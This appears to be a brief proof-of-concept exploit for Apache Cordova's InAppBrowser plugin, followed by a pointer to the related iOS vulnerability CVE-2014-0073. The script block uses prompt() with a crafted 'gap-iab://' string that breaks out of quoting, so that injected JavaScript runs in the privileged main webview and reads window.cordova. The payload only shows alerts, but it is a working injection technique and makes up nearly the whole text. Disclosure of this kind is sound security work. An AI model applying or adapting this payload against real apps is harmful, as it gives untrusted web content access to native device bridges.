<script>
alert('InAppBrowser alert \n window.cordova = ' + JSON.stringify(window.cordova));
prompt("","gap-iab://InAppBrowser'-alert('MainWebview alert \\n window.cordova = ' + JSON.stringify(window.cordova))-'")
</script>
Similar vulnerability in iOS (CVE-2014-0073):
https://www.synopsys.com/blogs/software-security/cve-2014-0073-inappbrowser-vulnerability/